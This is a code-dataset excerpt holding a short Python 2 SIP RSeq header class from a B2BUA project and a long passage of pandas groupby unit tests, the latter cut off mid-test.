AVOXI/b2bua | sippy/SipRSeq.py | 2 | 1760 | # Copyright (c) 2015 Sippy Software, Inc. All rights reserved.
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation and/or
# other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from SipNumericHF import SipNumericHF
class SipRSeq(SipNumericHF):
hf_names = ('rseq',)
def __init__(self, body = None, number = 1):
SipNumericHF.__init__(self, body, number)
def getCanName(self, name, compact = False):
return 'RSeq'
if __name__ == '__main__':
rs = SipRSeq(body = '50')
rs.parse()
print rs.number
rs.number = 100
print str(rs)
| bsd-2-clause |
GuessWhoSamFoo/pandas | pandas/tests/groupby/test_function.py | 1 | 38953 | from string import ascii_lowercase
import numpy as np
import pytest
from pandas.compat import product as cart_product
from pandas.errors import UnsupportedFunctionCall
import pandas as pd
from pandas import (
DataFrame, Index, MultiIndex, Series, Timestamp, compat, date_range, isna)
import pandas.core.nanops as nanops
from pandas.util import testing as tm
@pytest.mark.parametrize("agg_func", ['any', 'all'])
@pytest.mark.parametrize("skipna", [True, False])
@pytest.mark.parametrize("vals", [
['foo', 'bar', 'baz'], ['foo', '', ''], ['', '', ''],
[1, 2, 3], [1, 0, 0], [0, 0, 0],
[1., 2., 3.], [1., 0., 0.], [0., 0., 0.],
[True, True, True], [True, False, False], [False, False, False],
[np.nan, np.nan, np.nan]
])
def test_groupby_bool_aggs(agg_func, skipna, vals):
df = DataFrame({'key': ['a'] * 3 + ['b'] * 3, 'val': vals * 2})
# Figure out expectation using Python builtin
exp = getattr(compat.builtins, agg_func)(vals)
# edge case for missing data with skipna and 'any'
if skipna and all(isna(vals)) and agg_func == 'any':
exp = False
exp_df = DataFrame([exp] * 2, columns=['val'], index=Index(
['a', 'b'], name='key'))
result = getattr(df.groupby('key'), agg_func)(skipna=skipna)
tm.assert_frame_equal(result, exp_df)
def test_max_min_non_numeric():
# #2700
aa = DataFrame({'nn': [11, 11, 22, 22],
'ii': [1, 2, 3, 4],
'ss': 4 * ['mama']})
result = aa.groupby('nn').max()
assert 'ss' in result
result = aa.groupby('nn').max(numeric_only=False)
assert 'ss' in result
result = aa.groupby('nn').min()
assert 'ss' in result
result = aa.groupby('nn').min(numeric_only=False)
assert 'ss' in result
def test_intercept_builtin_sum():
s = Series([1., 2., np.nan, 3.])
grouped = s.groupby([0, 1, 2, 2])
result = grouped.agg(compat.builtins.sum)
result2 = grouped.apply(compat.builtins.sum)
expected = grouped.sum()
tm.assert_series_equal(result, expected)
tm.assert_series_equal(result2, expected)
# @pytest.mark.parametrize("f", [max, min, sum])
# def test_builtins_apply(f):
@pytest.mark.parametrize("f", [max, min, sum])
@pytest.mark.parametrize('keys', [
"jim", # Single key
["jim", "joe"] # Multi-key
])
def test_builtins_apply(keys, f):
# see gh-8155
df = pd.DataFrame(np.random.randint(1, 50, (1000, 2)),
columns=["jim", "joe"])
df["jolie"] = np.random.randn(1000)
fname = f.__name__
result = df.groupby(keys).apply(f)
ngroups = len(df.drop_duplicates(subset=keys))
assert_msg = ("invalid frame shape: {} "
"(expected ({}, 3))".format(result.shape, ngroups))
assert result.shape == (ngroups, 3), assert_msg
tm.assert_frame_equal(result, # numpy's equivalent function
df.groupby(keys).apply(getattr(np, fname)))
if f != sum:
expected = df.groupby(keys).agg(fname).reset_index()
expected.set_index(keys, inplace=True, drop=False)
tm.assert_frame_equal(result, expected, check_dtype=False)
tm.assert_series_equal(getattr(result, fname)(),
getattr(df, fname)())
def test_arg_passthru():
# make sure that we are passing thru kwargs
# to our agg functions
# GH3668
# GH5724
df = pd.DataFrame(
{'group': [1, 1, 2],
'int': [1, 2, 3],
'float': [4., 5., 6.],
'string': list('abc'),
'category_string': pd.Series(list('abc')).astype('category'),
'category_int': [7, 8, 9],
'datetime': pd.date_range('20130101', periods=3),
'datetimetz': pd.date_range('20130101',
periods=3,
tz='US/Eastern'),
'timedelta': pd.timedelta_range('1 s', periods=3, freq='s')},
columns=['group', 'int', 'float', 'string',
'category_string', 'category_int',
'datetime', 'datetimetz',
'timedelta'])
expected_columns_numeric = Index(['int', 'float', 'category_int'])
# mean / median
expected = pd.DataFrame(
{'category_int': [7.5, 9],
'float': [4.5, 6.],
'timedelta': [pd.Timedelta('1.5s'),
pd.Timedelta('3s')],
'int': [1.5, 3],
'datetime': [pd.Timestamp('2013-01-01 12:00:00'),
pd.Timestamp('2013-01-03 00:00:00')],
'datetimetz': [
pd.Timestamp('2013-01-01 12:00:00', tz='US/Eastern'),
pd.Timestamp('2013-01-03 00:00:00', tz='US/Eastern')]},
index=Index([1, 2], name='group'),
columns=['int', 'float', 'category_int',
'datetime', 'datetimetz', 'timedelta'])
for attr in ['mean', 'median']:
f = getattr(df.groupby('group'), attr)
result = f()
tm.assert_index_equal(result.columns, expected_columns_numeric)
result = f(numeric_only=False)
tm.assert_frame_equal(result.reindex_like(expected), expected)
# TODO: min, max *should* handle
# categorical (ordered) dtype
expected_columns = Index(['int', 'float', 'string',
'category_int',
'datetime', 'datetimetz',
'timedelta'])
for attr in ['min', 'max']:
f = getattr(df.groupby('group'), attr)
result = f()
tm.assert_index_equal(result.columns, expected_columns)
result = f(numeric_only=False)
tm.assert_index_equal(result.columns, expected_columns)
expected_columns = Index(['int', 'float', 'string',
'category_string', 'category_int',
'datetime', 'datetimetz',
'timedelta'])
for attr in ['first', 'last']:
f = getattr(df.groupby('group'), attr)
result = f()
tm.assert_index_equal(result.columns, expected_columns)
result = f(numeric_only=False)
tm.assert_index_equal(result.columns, expected_columns)
expected_columns = Index(['int', 'float', 'string',
'category_int', 'timedelta'])
for attr in ['sum']:
f = getattr(df.groupby('group'), attr)
result = f()
tm.assert_index_equal(result.columns, expected_columns_numeric)
result = f(numeric_only=False)
tm.assert_index_equal(result.columns, expected_columns)
expected_columns = Index(['int', 'float', 'category_int'])
for attr in ['prod', 'cumprod']:
f = getattr(df.groupby('group'), attr)
result = f()
tm.assert_index_equal(result.columns, expected_columns_numeric)
result = f(numeric_only=False)
tm.assert_index_equal(result.columns, expected_columns)
# like min, max, but don't include strings
expected_columns = Index(['int', 'float',
'category_int',
'datetime', 'datetimetz',
'timedelta'])
for attr in ['cummin', 'cummax']:
f = getattr(df.groupby('group'), attr)
result = f()
# GH 15561: numeric_only=False set by default like min/max
tm.assert_index_equal(result.columns, expected_columns)
result = f(numeric_only=False)
tm.assert_index_equal(result.columns, expected_columns)
expected_columns = Index(['int', 'float', 'category_int',
'timedelta'])
for attr in ['cumsum']:
f = getattr(df.groupby('group'), attr)
result = f()
tm.assert_index_equal(result.columns, expected_columns_numeric)
result = f(numeric_only=False)
tm.assert_index_equal(result.columns, expected_columns)
def test_non_cython_api():
# GH5610
# non-cython calls should not include the grouper
df = DataFrame(
[[1, 2, 'foo'],
[1, np.nan, 'bar'],
[3, np.nan, 'baz']],
columns=['A', 'B', 'C'])
g = df.groupby('A')
gni = df.groupby('A', as_index=False)
# mad
expected = DataFrame([[0], [np.nan]], columns=['B'], index=[1, 3])
expected.index.name = 'A'
result = g.mad()
tm.assert_frame_equal(result, expected)
expected = DataFrame([[0., 0.], [0, np.nan]], columns=['A', 'B'],
index=[0, 1])
result = gni.mad()
tm.assert_frame_equal(result, expected)
# describe
expected_index = pd.Index([1, 3], name='A')
expected_col = pd.MultiIndex(levels=[['B'],
['count', 'mean', 'std', 'min',
'25%', '50%', '75%', 'max']],
codes=[[0] * 8, list(range(8))])
expected = pd.DataFrame([[1.0, 2.0, np.nan, 2.0, 2.0, 2.0, 2.0, 2.0],
[0.0, np.nan, np.nan, np.nan, np.nan, np.nan,
np.nan, np.nan]],
index=expected_index,
columns=expected_col)
result = g.describe()
tm.assert_frame_equal(result, expected)
expected = pd.concat([df[df.A == 1].describe().unstack().to_frame().T,
df[df.A == 3].describe().unstack().to_frame().T])
expected.index = pd.Index([0, 1])
result = gni.describe()
tm.assert_frame_equal(result, expected)
# any
expected = DataFrame([[True, True], [False, True]], columns=['B', 'C'],
index=[1, 3])
expected.index.name = 'A'
result = g.any()
tm.assert_frame_equal(result, expected)
# idxmax
expected = DataFrame([[0.0], [np.nan]], columns=['B'], index=[1, 3])
expected.index.name = 'A'
result = g.idxmax()
tm.assert_frame_equal(result, expected)
def test_cython_api2():
# this takes the fast apply path
# cumsum (GH5614)
df = DataFrame(
[[1, 2, np.nan], [1, np.nan, 9], [3, 4, 9]
], columns=['A', 'B', 'C'])
expected = DataFrame(
[[2, np.nan], [np.nan, 9], [4, 9]], columns=['B', 'C'])
result = df.groupby('A').cumsum()
tm.assert_frame_equal(result, expected)
# GH 5755 - cumsum is a transformer and should ignore as_index
result = df.groupby('A', as_index=False).cumsum()
tm.assert_frame_equal(result, expected)
# GH 13994
result = df.groupby('A').cumsum(axis=1)
expected = df.cumsum(axis=1)
tm.assert_frame_equal(result, expected)
result = df.groupby('A').cumprod(axis=1)
expected = df.cumprod(axis=1)
tm.assert_frame_equal(result, expected)
def test_cython_median():
df = DataFrame(np.random.randn(1000))
df.values[::2] = np.nan
labels = np.random.randint(0, 50, size=1000).astype(float)
labels[::17] = np.nan
result = df.groupby(labels).median()
exp = df.groupby(labels).agg(nanops.nanmedian)
tm.assert_frame_equal(result, exp)
df = DataFrame(np.random.randn(1000, 5))
rs = df.groupby(labels).agg(np.median)
xp = df.groupby(labels).median()
tm.assert_frame_equal(rs, xp)
def test_median_empty_bins(observed):
df = pd.DataFrame(np.random.randint(0, 44, 500))
grps = range(0, 55, 5)
bins = pd.cut(df[0], grps)
result = df.groupby(bins, observed=observed).median()
expected = df.groupby(bins, observed=observed).agg(lambda x: x.median())
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("dtype", [
'int8', 'int16', 'int32', 'int64', 'float32', 'float64'])
@pytest.mark.parametrize("method,data", [
('first', {'df': [{'a': 1, 'b': 1}, {'a': 2, 'b': 3}]}),
('last', {'df': [{'a': 1, 'b': 2}, {'a': 2, 'b': 4}]}),
('min', {'df': [{'a': 1, 'b': 1}, {'a': 2, 'b': 3}]}),
('max', {'df': [{'a': 1, 'b': 2}, {'a': 2, 'b': 4}]}),
('nth', {'df': [{'a': 1, 'b': 2}, {'a': 2, 'b': 4}],
'args': [1]}),
('count', {'df': [{'a': 1, 'b': 2}, {'a': 2, 'b': 2}],
'out_type': 'int64'})
])
def test_groupby_non_arithmetic_agg_types(dtype, method, data):
# GH9311, GH6620
df = pd.DataFrame(
[{'a': 1, 'b': 1},
{'a': 1, 'b': 2},
{'a': 2, 'b': 3},
{'a': 2, 'b': 4}])
df['b'] = df.b.astype(dtype)
if 'args' not in data:
data['args'] = []
if 'out_type' in data:
out_type = data['out_type']
else:
out_type = dtype
exp = data['df']
df_out = pd.DataFrame(exp)
df_out['b'] = df_out.b.astype(out_type)
df_out.set_index('a', inplace=True)
grpd = df.groupby('a')
t = getattr(grpd, method)(*data['args'])
tm.assert_frame_equal(t, df_out)
@pytest.mark.parametrize("i", [
(Timestamp("2011-01-15 12:50:28.502376"),
Timestamp("2011-01-20 12:50:28.593448")),
(24650000000000001, 24650000000000002)
])
def test_groupby_non_arithmetic_agg_int_like_precision(i):
# see gh-6620, gh-9311
df = pd.DataFrame([{"a": 1, "b": i[0]}, {"a": 1, "b": i[1]}])
grp_exp = {"first": {"expected": i[0]},
"last": {"expected": i[1]},
"min": {"expected": i[0]},
"max": {"expected": i[1]},
"nth": {"expected": i[1],
"args": [1]},
"count": {"expected": 2}}
for method, data in compat.iteritems(grp_exp):
if "args" not in data:
data["args"] = []
grouped = df.groupby("a")
res = getattr(grouped, method)(*data["args"])
assert res.iloc[0].b == data["expected"]
def test_fill_consistency():
# GH9221
# pass thru keyword arguments to the generated wrapper
# are set if the passed kw is None (only)
df = DataFrame(index=pd.MultiIndex.from_product(
[['value1', 'value2'], date_range('2014-01-01', '2014-01-06')]),
columns=Index(
['1', '2'], name='id'))
df['1'] = [np.nan, 1, np.nan, np.nan, 11, np.nan, np.nan, 2, np.nan,
np.nan, 22, np.nan]
df['2'] = [np.nan, 3, np.nan, np.nan, 33, np.nan, np.nan, 4, np.nan,
np.nan, 44, np.nan]
expected = df.groupby(level=0, axis=0).fillna(method='ffill')
result = df.T.groupby(level=0, axis=1).fillna(method='ffill').T
tm.assert_frame_equal(result, expected)
def test_groupby_cumprod():
# GH 4095
df = pd.DataFrame({'key': ['b'] * 10, 'value': 2})
actual = df.groupby('key')['value'].cumprod()
expected = df.groupby('key')['value'].apply(lambda x: x.cumprod())
expected.name = 'value'
tm.assert_series_equal(actual, expected)
df = pd.DataFrame({'key': ['b'] * 100, 'value': 2})
actual = df.groupby('key')['value'].cumprod()
# if overflows, groupby product casts to float
# while numpy passes back invalid values
df['value'] = df['value'].astype(float)
expected = df.groupby('key')['value'].apply(lambda x: x.cumprod())
expected.name = 'value'
tm.assert_series_equal(actual, expected)
def test_ops_general():
ops = [('mean', np.mean),
('median', np.median),
('std', np.std),
('var', np.var),
('sum', np.sum),
('prod', np.prod),
('min', np.min),
('max', np.max),
('first', lambda x: x.iloc[0]),
('last', lambda x: x.iloc[-1]),
('count', np.size), ]
try:
from scipy.stats import sem
except ImportError:
pass
else:
ops.append(('sem', sem))
df = DataFrame(np.random.randn(1000))
labels = np.random.randint(0, 50, size=1000).astype(float)
for op, targop in ops:
result = getattr(df.groupby(labels), op)().astype(float)
expected = df.groupby(labels).agg(targop)
try:
tm.assert_frame_equal(result, expected)
except BaseException as exc:
exc.args += ('operation: %s' % op, )
raise
def test_max_nan_bug():
raw = """,Date,app,File
-04-23,2013-04-23 00:00:00,,log080001.log
-05-06,2013-05-06 00:00:00,,log.log
-05-07,2013-05-07 00:00:00,OE,xlsx"""
df = pd.read_csv(compat.StringIO(raw), parse_dates=[0])
gb = df.groupby('Date')
r = gb[['File']].max()
e = gb['File'].max().to_frame()
tm.assert_frame_equal(r, e)
assert not r['File'].isna().any()
def test_nlargest():
a = Series([1, 3, 5, 7, 2, 9, 0, 4, 6, 10])
b = Series(list('a' * 5 + 'b' * 5))
gb = a.groupby(b)
r = gb.nlargest(3)
e = Series([
7, 5, 3, 10, 9, 6
], index=MultiIndex.from_arrays([list('aaabbb'), [3, 2, 1, 9, 5, 8]]))
tm.assert_series_equal(r, e)
a = Series([1, 1, 3, 2, 0, 3, 3, 2, 1, 0])
gb = a.groupby(b)
e = Series([
3, 2, 1, 3, 3, 2
], index=MultiIndex.from_arrays([list('aaabbb'), [2, 3, 1, 6, 5, 7]]))
tm.assert_series_equal(gb.nlargest(3, keep='last'), e)
def test_nsmallest():
a = Series([1, 3, 5, 7, 2, 9, 0, 4, 6, 10])
b = Series(list('a' * 5 + 'b' * 5))
gb = a.groupby(b)
r = gb.nsmallest(3)
e = Series([
1, 2, 3, 0, 4, 6
], index=MultiIndex.from_arrays([list('aaabbb'), [0, 4, 1, 6, 7, 8]]))
tm.assert_series_equal(r, e)
a = Series([1, 1, 3, 2, 0, 3, 3, 2, 1, 0])
gb = a.groupby(b)
e = Series([
0, 1, 1, 0, 1, 2
], index=MultiIndex.from_arrays([list('aaabbb'), [4, 1, 0, 9, 8, 7]]))
tm.assert_series_equal(gb.nsmallest(3, keep='last'), e)
@pytest.mark.parametrize("func", [
'mean', 'var', 'std', 'cumprod', 'cumsum'
])
def test_numpy_compat(func):
# see gh-12811
df = pd.DataFrame({'A': [1, 2, 1], 'B': [1, 2, 3]})
g = df.groupby('A')
msg = "numpy operations are not valid with groupby"
with pytest.raises(UnsupportedFunctionCall, match=msg):
getattr(g, func)(1, 2, 3)
with pytest.raises(UnsupportedFunctionCall, match=msg):
getattr(g, func)(foo=1)
def test_cummin_cummax():
# GH 15048
num_types = [np.int32, np.int64, np.float32, np.float64]
num_mins = [np.iinfo(np.int32).min, np.iinfo(np.int64).min,
np.finfo(np.float32).min, np.finfo(np.float64).min]
num_max = [np.iinfo(np.int32).max, np.iinfo(np.int64).max,
np.finfo(np.float32).max, np.finfo(np.float64).max]
base_df = pd.DataFrame({'A': [1, 1, 1, 1, 2, 2, 2, 2],
'B': [3, 4, 3, 2, 2, 3, 2, 1]})
expected_mins = [3, 3, 3, 2, 2, 2, 2, 1]
expected_maxs = [3, 4, 4, 4, 2, 3, 3, 3]
for dtype, min_val, max_val in zip(num_types, num_mins, num_max):
df = base_df.astype(dtype)
# cummin
expected = pd.DataFrame({'B': expected_mins}).astype(dtype)
result = df.groupby('A').cummin()
tm.assert_frame_equal(result, expected)
result = df.groupby('A').B.apply(lambda x: x.cummin()).to_frame()
tm.assert_frame_equal(result, expected)
# Test cummin w/ min value for dtype
df.loc[[2, 6], 'B'] = min_val
expected.loc[[2, 3, 6, 7], 'B'] = min_val
result = df.groupby('A').cummin()
tm.assert_frame_equal(result, expected)
expected = df.groupby('A').B.apply(lambda x: x.cummin()).to_frame()
tm.assert_frame_equal(result, expected)
# cummax
expected = pd.DataFrame({'B': expected_maxs}).astype(dtype)
result = df.groupby('A').cummax()
tm.assert_frame_equal(result, expected)
result = df.groupby('A').B.apply(lambda x: x.cummax()).to_frame()
tm.assert_frame_equal(result, expected)
# Test cummax w/ max value for dtype
df.loc[[2, 6], 'B'] = max_val
expected.loc[[2, 3, 6, 7], 'B'] = max_val
result = df.groupby('A').cummax()
tm.assert_frame_equal(result, expected)
expected = df.groupby('A').B.apply(lambda x: x.cummax()).to_frame()
tm.assert_frame_equal(result, expected)
# Test nan in some values
base_df.loc[[0, 2, 4, 6], 'B'] = np.nan
expected = pd.DataFrame({'B': [np.nan, 4, np.nan, 2,
np.nan, 3, np.nan, 1]})
result = base_df.groupby('A').cummin()
tm.assert_frame_equal(result, expected)
expected = (base_df.groupby('A')
.B
.apply(lambda x: x.cummin())
.to_frame())
tm.assert_frame_equal(result, expected)
expected = pd.DataFrame({'B': [np.nan, 4, np.nan, 4,
np.nan, 3, np.nan, 3]})
result = base_df.groupby('A').cummax()
tm.assert_frame_equal(result, expected)
expected = (base_df.groupby('A')
.B
.apply(lambda x: x.cummax())
.to_frame())
tm.assert_frame_equal(result, expected)
# Test nan in entire column
base_df['B'] = np.nan
expected = pd.DataFrame({'B': [np.nan] * 8})
result = base_df.groupby('A').cummin()
tm.assert_frame_equal(expected, result)
result = base_df.groupby('A').B.apply(lambda x: x.cummin()).to_frame()
tm.assert_frame_equal(expected, result)
result = base_df.groupby('A').cummax()
tm.assert_frame_equal(expected, result)
result = base_df.groupby('A').B.apply(lambda x: x.cummax()).to_frame()
tm.assert_frame_equal(expected, result)
# GH 15561
df = pd.DataFrame(dict(a=[1], b=pd.to_datetime(['2001'])))
expected = pd.Series(pd.to_datetime('2001'), index=[0], name='b')
for method in ['cummax', 'cummin']:
result = getattr(df.groupby('a')['b'], method)()
tm.assert_series_equal(expected, result)
# GH 15635
df = pd.DataFrame(dict(a=[1, 2, 1], b=[2, 1, 1]))
result = df.groupby('a').b.cummax()
expected = pd.Series([2, 1, 2], name='b')
tm.assert_series_equal(result, expected)
df = pd.DataFrame(dict(a=[1, 2, 1], b=[1, 2, 2]))
result = df.groupby('a').b.cummin()
expected = pd.Series([1, 2, 1], name='b')
tm.assert_series_equal(result, expected)
@pytest.mark.parametrize('in_vals, out_vals', [
# Basics: strictly increasing (T), strictly decreasing (F),
# abs val increasing (F), non-strictly increasing (T)
([1, 2, 5, 3, 2, 0, 4, 5, -6, 1, 1],
[True, False, False, True]),
# Test with inf vals
([1, 2.1, np.inf, 3, 2, np.inf, -np.inf, 5, 11, 1, -np.inf],
[True, False, True, False]),
# Test with nan vals; should always be False
([1, 2, np.nan, 3, 2, np.nan, np.nan, 5, -np.inf, 1, np.nan],
[False, False, False, False]),
])
def test_is_monotonic_increasing(in_vals, out_vals):
# GH 17015
source_dict = {
'A': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11'],
'B': ['a', 'a', 'a', 'b', 'b', 'b', 'c', 'c', 'c', 'd', 'd'],
'C': in_vals}
df = pd.DataFrame(source_dict)
result = df.groupby('B').C.is_monotonic_increasing
index = Index(list('abcd'), name='B')
expected = pd.Series(index=index, data=out_vals, name='C')
tm.assert_series_equal(result, expected)
# Also check result equal to manually taking x.is_monotonic_increasing.
expected = (
df.groupby(['B']).C.apply(lambda x: x.is_monotonic_increasing))
tm.assert_series_equal(result, expected)
@pytest.mark.parametrize('in_vals, out_vals', [
# Basics: strictly decreasing (T), strictly increasing (F),
# abs val decreasing (F), non-strictly increasing (T)
([10, 9, 7, 3, 4, 5, -3, 2, 0, 1, 1],
[True, False, False, True]),
# Test with inf vals
([np.inf, 1, -np.inf, np.inf, 2, -3, -np.inf, 5, -3, -np.inf, -np.inf],
[True, True, False, True]),
# Test with nan vals; should always be False
([1, 2, np.nan, 3, 2, np.nan, np.nan, 5, -np.inf, 1, np.nan],
[False, False, False, False]),
])
def test_is_monotonic_decreasing(in_vals, out_vals):
# GH 17015
source_dict = {
'A': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11'],
'B': ['a', 'a', 'a', 'b', 'b', 'b', 'c', 'c', 'c', 'd', 'd'],
'C': in_vals}
df = pd.DataFrame(source_dict)
result = df.groupby('B').C.is_monotonic_decreasing
index = Index(list('abcd'), name='B')
expected = pd.Series(index=index, data=out_vals, name='C')
tm.assert_series_equal(result, expected)
# describe
# --------------------------------
def test_apply_describe_bug(mframe):
grouped = mframe.groupby(level='first')
grouped.describe() # it works!
def test_series_describe_multikey():
ts = tm.makeTimeSeries()
grouped = ts.groupby([lambda x: x.year, lambda x: x.month])
result = grouped.describe()
tm.assert_series_equal(result['mean'], grouped.mean(),
check_names=False)
tm.assert_series_equal(result['std'], grouped.std(), check_names=False)
tm.assert_series_equal(result['min'], grouped.min(), check_names=False)
def test_series_describe_single():
ts = tm.makeTimeSeries()
grouped = ts.groupby(lambda x: x.month)
result = grouped.apply(lambda x: x.describe())
expected = grouped.describe().stack()
tm.assert_series_equal(result, expected)
def test_series_index_name(df):
grouped = df.loc[:, ['C']].groupby(df['A'])
result = grouped.agg(lambda x: x.mean())
assert result.index.name == 'A'
def test_frame_describe_multikey(tsframe):
grouped = tsframe.groupby([lambda x: x.year, lambda x: x.month])
result = grouped.describe()
desc_groups = []
for col in tsframe:
group = grouped[col].describe()
# GH 17464 - Remove duplicate MultiIndex levels
group_col = pd.MultiIndex(
levels=[[col], group.columns],
codes=[[0] * len(group.columns), range(len(group.columns))])
group = pd.DataFrame(group.values,
columns=group_col,
index=group.index)
desc_groups.append(group)
expected = pd.concat(desc_groups, axis=1)
tm.assert_frame_equal(result, expected)
groupedT = tsframe.groupby({'A': 0, 'B': 0,
'C': 1, 'D': 1}, axis=1)
result = groupedT.describe()
expected = tsframe.describe().T
expected.index = pd.MultiIndex(
levels=[[0, 1], expected.index],
codes=[[0, 0, 1, 1], range(len(expected.index))])
tm.assert_frame_equal(result, expected)
def test_frame_describe_tupleindex():
# GH 14848 - regression from 0.19.0 to 0.19.1
df1 = DataFrame({'x': [1, 2, 3, 4, 5] * 3,
'y': [10, 20, 30, 40, 50] * 3,
'z': [100, 200, 300, 400, 500] * 3})
df1['k'] = [(0, 0, 1), (0, 1, 0), (1, 0, 0)] * 5
df2 = df1.rename(columns={'k': 'key'})
msg = "Names should be list-like for a MultiIndex"
with pytest.raises(ValueError, match=msg):
df1.groupby('k').describe()
with pytest.raises(ValueError, match=msg):
df2.groupby('key').describe()
def test_frame_describe_unstacked_format():
# GH 4792
prices = {pd.Timestamp('2011-01-06 10:59:05', tz=None): 24990,
pd.Timestamp('2011-01-06 12:43:33', tz=None): 25499,
pd.Timestamp('2011-01-06 12:54:09', tz=None): 25499}
volumes = {pd.Timestamp('2011-01-06 10:59:05', tz=None): 1500000000,
pd.Timestamp('2011-01-06 12:43:33', tz=None): 5000000000,
pd.Timestamp('2011-01-06 12:54:09', tz=None): 100000000}
df = pd.DataFrame({'PRICE': prices,
'VOLUME': volumes})
result = df.groupby('PRICE').VOLUME.describe()
data = [df[df.PRICE == 24990].VOLUME.describe().values.tolist(),
df[df.PRICE == 25499].VOLUME.describe().values.tolist()]
expected = pd.DataFrame(data,
index=pd.Index([24990, 25499], name='PRICE'),
columns=['count', 'mean', 'std', 'min',
'25%', '50%', '75%', 'max'])
tm.assert_frame_equal(result, expected)
# nunique
# --------------------------------
@pytest.mark.parametrize('n', 10 ** np.arange(2, 6))
@pytest.mark.parametrize('m', [10, 100, 1000])
@pytest.mark.parametrize('sort', [False, True])
@pytest.mark.parametrize('dropna', [False, True])
def test_series_groupby_nunique(n, m, sort, dropna):
def check_nunique(df, keys, as_index=True):
gr = df.groupby(keys, as_index=as_index, sort=sort)
left = gr['julie'].nunique(dropna=dropna)
gr = df.groupby(keys, as_index=as_index, sort=sort)
right = gr['julie'].apply(Series.nunique, dropna=dropna)
if not as_index:
right = right.reset_index(drop=True)
tm.assert_series_equal(left, right, check_names=False)
days = date_range('2015-08-23', periods=10)
frame = DataFrame({'jim': np.random.choice(list(ascii_lowercase), n),
'joe': np.random.choice(days, n),
'julie': np.random.randint(0, m, n)})
check_nunique(frame, ['jim'])
check_nunique(frame, ['jim', 'joe'])
frame.loc[1::17, 'jim'] = None
frame.loc[3::37, 'joe'] = None
frame.loc[7::19, 'julie'] = None
frame.loc[8::19, 'julie'] = None
frame.loc[9::19, 'julie'] = None
check_nunique(frame, ['jim'])
check_nunique(frame, ['jim', 'joe'])
check_nunique(frame, ['jim'], as_index=False)
check_nunique(frame, ['jim', 'joe'], as_index=False)
def test_nunique():
df = DataFrame({
'A': list('abbacc'),
'B': list('abxacc'),
'C': list('abbacx'),
})
expected = DataFrame({'A': [1] * 3, 'B': [1, 2, 1], 'C': [1, 1, 2]})
result = df.groupby('A', as_index=False).nunique()
tm.assert_frame_equal(result, expected)
# as_index
expected.index = list('abc')
expected.index.name = 'A'
result = df.groupby('A').nunique()
tm.assert_frame_equal(result, expected)
# with na
result = df.replace({'x': None}).groupby('A').nunique(dropna=False)
tm.assert_frame_equal(result, expected)
# dropna
expected = DataFrame({'A': [1] * 3, 'B': [1] * 3, 'C': [1] * 3},
index=list('abc'))
expected.index.name = 'A'
result = df.replace({'x': None}).groupby('A').nunique()
tm.assert_frame_equal(result, expected)
def test_nunique_with_object():
# GH 11077
data = pd.DataFrame(
[[100, 1, 'Alice'],
[200, 2, 'Bob'],
[300, 3, 'Charlie'],
[-400, 4, 'Dan'],
[500, 5, 'Edith']],
columns=['amount', 'id', 'name']
)
result = data.groupby(['id', 'amount'])['name'].nunique()
index = MultiIndex.from_arrays([data.id, data.amount])
expected = pd.Series([1] * 5, name='name', index=index)
tm.assert_series_equal(result, expected)
def test_nunique_with_empty_series():
# GH 12553
data = pd.Series(name='name')
result = data.groupby(level=0).nunique()
expected = pd.Series(name='name', dtype='int64')
tm.assert_series_equal(result, expected)
def test_nunique_with_timegrouper():
# GH 13453
test = pd.DataFrame({
'time': [Timestamp('2016-06-28 09:35:35'),
Timestamp('2016-06-28 16:09:30'),
Timestamp('2016-06-28 16:46:28')],
'data': ['1', '2', '3']}).set_index('time')
result = test.groupby(pd.Grouper(freq='h'))['data'].nunique()
expected = test.groupby(
pd.Grouper(freq='h')
)['data'].apply(pd.Series.nunique)
tm.assert_series_equal(result, expected)
# count
# --------------------------------
def test_groupby_timedelta_cython_count():
df = DataFrame({'g': list('ab' * 2),
'delt': np.arange(4).astype('timedelta64[ns]')})
expected = Series([
2, 2
], index=pd.Index(['a', 'b'], name='g'), name='delt')
result = df.groupby('g').delt.count()
tm.assert_series_equal(expected, result)
def test_count():
n = 1 << 15
dr = date_range('2015-08-30', periods=n // 10, freq='T')
df = DataFrame({
'1st': np.random.choice(
list(ascii_lowercase), n),
'2nd': np.random.randint(0, 5, n),
'3rd': np.random.randn(n).round(3),
'4th': np.random.randint(-10, 10, n),
'5th': np.random.choice(dr, n),
'6th': np.random.randn(n).round(3),
'7th': np.random.randn(n).round(3),
'8th': np.random.choice(dr, n) - np.random.choice(dr, 1),
'9th': np.random.choice(
list(ascii_lowercase), n)
})
for col in df.columns.drop(['1st', '2nd', '4th']):
df.loc[np.random.choice(n, n // 10), col] = np.nan
df['9th'] = df['9th'].astype('category')
for key in '1st', '2nd', ['1st', '2nd']:
left = df.groupby(key).count()
right = df.groupby(key).apply(DataFrame.count).drop(key, axis=1)
tm.assert_frame_equal(left, right)
# GH5610
# count counts non-nulls
df = pd.DataFrame([[1, 2, 'foo'],
[1, np.nan, 'bar'],
[3, np.nan, np.nan]],
columns=['A', 'B', 'C'])
count_as = df.groupby('A').count()
